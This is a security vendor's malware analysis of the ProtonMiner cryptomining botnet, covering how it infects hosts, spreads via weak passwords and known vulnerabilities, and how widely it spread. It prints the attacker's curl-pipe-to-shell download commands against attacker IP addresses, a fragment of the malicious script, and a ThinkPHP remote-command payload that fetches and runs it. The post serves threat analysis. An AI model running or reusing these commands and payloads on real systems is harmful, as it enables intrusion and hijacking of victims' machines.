Security is sometimes a very simple business: if you rely on weak passwords and use root access, there is a high chance that someone will develop a malware to hack your database or web service.
This blog post provides a recent example for this truth: ProtonMiner, a new cryptocurrency miner hijacker discovered by Alibaba Cloud security team, which became extremely active since mid-February 2019. The post provides a clear analysis of the malware - how it infects, how it propagates to additional victims, its impact, and its recent distribution trend; the post also offers security recommendations to avoid it.
Yohai Einav, Principal Security Researcher, Alibaba Cloud Security Innovation Labs
Security researchers at Alibaba Cloud have recently detected an outburst of a new cryptocurrency miner hijacker, which they named "ProtonMiner". This miner was very likely created by the same attacker's group mentioned by TrendMicro in their December 2018 blog post. The botnet initially propagated slowly using several old vulnerabilities in ElasticSearch, yet, since mid-February we saw its popularity grow considerably as it expanded its attack surface.
This blog post provides details on how the botnet propagates itself, as well as our security recommendations for end users to avoid being infected.
Step 1: The attacker controls the compromised hosts and runs one of following commands to download uuu.sh (or update.sh, which has identical content):
/bin/bash -c curl -fsSL http://18.104.22.168:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh /bin/bash -c curl -fsSL http://22.214.171.124:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh
Step 2: The uuu.sh (or update.sh) script downloads three files: a trojan, a miner and a mining configuration file. The miner will mine cryptocurrency on the compromised host, while the trojan will continue to distribute to other uncompromised hosts.
The uuu.sh script firstly tries to update /etc/devtools, and test whether the current account has root privilege. Only when it is root the main part of script would execute and mining would start.
#!/bin/sh echo 1 > /etc/devtools if [ -f "$rtdir" ] then echo "i am root" echo "goto 1" >> /etc/devtools \# download & attack fi
Other parts of script consist of typical mining botnet behavior: it first detects and kills process of other mining groups, adds itself to crontab, and alters iptables configuration to allow communication on certain ports. However, the attacker seems to be more cautious than other malicious script authors in following aspects:
The propagation module of ProtonMiner is named "systemctI" and is written in Go language. Its main function is as following:
The trojan first initializes the ip list and weak password list to start the scanning. The initialization is done by requesting and downloading the lists from the following URLs:
https://pixeldra.in/api/download/I9RRye (IP address CIDR blocks)
https://pixeldra.in/api/download/-7A5aP (weak passwords)
After that, it enters the mainScan() function, which contains multiple sub-functions to scan and exploit services.
This is the list of impacted services and corresponding vulnerabilities:
|Spring Data Commons||CVE-2018-1273|
|SQL Server||Weak password|
|ThinkPHP||Two RCEs(Remote Command Execution) including CVE-2018-20062|
For example, here it is a ThinkPHP payload (the infected host name is masked for privacy issue):
POST /index.php?s=captcha HTTP/1.1%0d%0aHost: 47.244.[xxx].xxx=system&method=get&server[REQUEST_METHOD]=url -fsSLhttp://126.96.36.199:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh
After extending its attack surface, ProtonMiner's distribution gained momentum, and reached a peak of about one thousand plus infections around mid-February of this year.
Figure 1: Daily distribution of devices infected by ProtonMiner
|update.sh||ce10c8da626e5c24eab3e2f7e496cb57 (same as uuu.sh)|
Usernames at pool:
Alibaba Clouder - July 27, 2018
Alibaba Cloud Security - January 13, 2019
Alibaba Clouder - January 23, 2018
- March 27, 2018
Alibaba Clouder - February 4, 2019
Alibaba Clouder - January 3, 2019
A cloud firewall service utilizing big data capabilities to protect against web-based attacksLearn More
Low-cost Web Hosting from $0.99/monthLearn More
Identify vulnerabilities and improve security management of Alibaba Cloud WAF and Anti-DDoS and with a fully managed security serviceLearn More
Quickly Improves High Availability For ApplicationsLearn More
More Posts by Alibaba Cloud Security